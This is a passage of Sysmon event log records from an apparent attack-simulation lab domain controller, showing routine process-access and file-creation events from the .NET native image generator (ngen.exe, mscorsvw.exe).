PCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:14.654\r\nProcessGuid: {E2A3D6B1-1376-5F25-0000-0010690F0F00}\r\nProcessId: 2892\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b4c-0\\System.IdentityModel.Services.dll\r\nCreationUtcTime: 2020-08-01 07:02:14.654","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:14.654","ProcessGuid":"{E2A3D6B1-1376-5F25-0000-0010690F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b4c-0\\System.IdentityModel.Services.dll","CreationUtcTime":"2020-08-01 07:02:14.654","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.701\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001099160F00}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.701","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001099160F00}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001099160F00}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001099160F00}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-001099160F00}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-001099160F00}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.732\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.732","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.732\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.732","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:14.873\r\nProcessGuid: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nProcessId: 4560\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\System.IO.Compression.dll\r\nCreationUtcTime: 2020-08-01 07:02:14.873","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:14.873","ProcessGuid":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\System.IO.Compression.dll","CreationUtcTime":"2020-08-01 07:02:14.873","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.919\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-00100F1D0F00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.919","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-00100F1D0F00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Frame